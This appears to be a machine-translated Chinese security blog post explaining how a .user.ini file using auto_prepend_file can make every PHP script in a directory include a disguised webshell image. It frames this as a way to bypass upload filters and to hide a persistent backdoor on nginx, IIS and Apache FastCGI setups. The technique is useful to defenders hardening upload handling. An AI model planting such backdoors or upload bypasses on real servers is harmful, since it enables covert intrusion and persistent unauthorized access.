PHP backdoor composed of the. user. ini file
0x00 background
This is an estimate that many people think it is a bad street thing:
PHP backdoor composed of. htaccess files
Let me create a new one:. user. ini. It is more widely used than. htaccess. This method can be used for php running with fastcgi, whether it is nginx/apache/IIS. My nginx servers are all fpm/fastcgi, and all my IIS php5.3 and above use fastcgi/cgi. I also use fcgi in apache under win, which is very broad, unlike. htaccess has limitations.
0x01. user. ini
So what is. user. ini?
This should start with php. ini. Php. ini is the default configuration file of php, which includes many php configurations. These configurations are divided into several types: PHP_INI_SYSTEM, PHP_INI_PERDIR, PHP_INI_ALL, and PHP_INI_USER. Here you can see: What are the differences between the http://php.net/manual/zh/ini.list.php models? Take a look at the official explanation:
It is mentioned that the mode is PHP_INI_USER, which can be set in the ini_set () function, registry, and. user. ini. Here we mention. user. ini. What is the configuration file? The official document explains again here:
In addition to the main php. in addition to ini, PHP also scans INI files in each directory, the directory where the executed PHP file is located has been raised to the web ROOT directory (specified by $ _ SERVER ['document _ root ). If the PHP file to be executed is outside the web root directory, only the directory is scanned.
In. user. ini INI files, only INI settings with PHP_INI_PERDIR and PHP_INI_USER modes can be identified.
It is clear here ,. user. ini is actually a php that can be "customized" by users. ini, We can customize the settings for the mode "PHP_INI_PERDIR, PHP_INI_USER. (PHP_INI_PERDIR, which is not mentioned in the preceding table, can also be set in. user. ini)
In fact, all modes except PHP_INI_SYSTEM (including PHP_INI_ALL) can be set through. user. ini.
In addition, unlike php. ini,. user. ini is an ini file that can be dynamically loaded. That is to say, after I modify. user. ini, I do not need to restart the server middleware. I only need to wait for the time set by user_ini.cache_ttl (300 seconds by default) to be reloaded.
Then we can see php. unfortunately, I was frustrated to find that only slightly sensitive configuration items are in PHP_INI_SYSTEM mode (or even php. ini only), including disable_functions, extension_dir, and enable_dl. However, we can easily construct a "backdoor" using the. user. ini file ".
There are two interesting items in the Php configuration item (first and fourth ):
Auto_append_file and auto_prepend_file. Click here to see what it means:
Specify a file that is automatically included before the file to be executed, similar to calling the require () function before the file. Similar to auto_append_file, it is only contained after the file. The usage is very simple. It is directly written in. user. ini:
auto_prepend_file=01.gif
01.gif is the file to be included.
Therefore, we can use. user. ini to easily make all PHP files "automatically" include a file, which can be a normal PHP file or a webshell containing a sentence.
I tested it on IIS6.0 + Fastcgi + PHP5.3 and nginx + fpm + php5.3 respectively. The directory contains .user.ini and 01.gif with webshell. echo. php:
Access echo. php to see the backdoor:
Nginx:
In this case, we can think about the situations in which this posture can be used? For example, if a website does not allow you to upload a. php file, you can upload a. user. ini file, and then upload an image horse for getshell. However, the premise is that there must be a normal PHP file in the folder containing. user. ini, otherwise it cannot be included. For example, you just want to hide a backdoor. This method is the most convenient.
0x02 references: Http://php.net/manual/zh/ini.list.php
Http://php.net/manual/zh/configuration.changes.modes.php
Http://php.net/manual/zh/configuration.file.per-user.php
Http://php.net/manual/zh/configuration.changes.php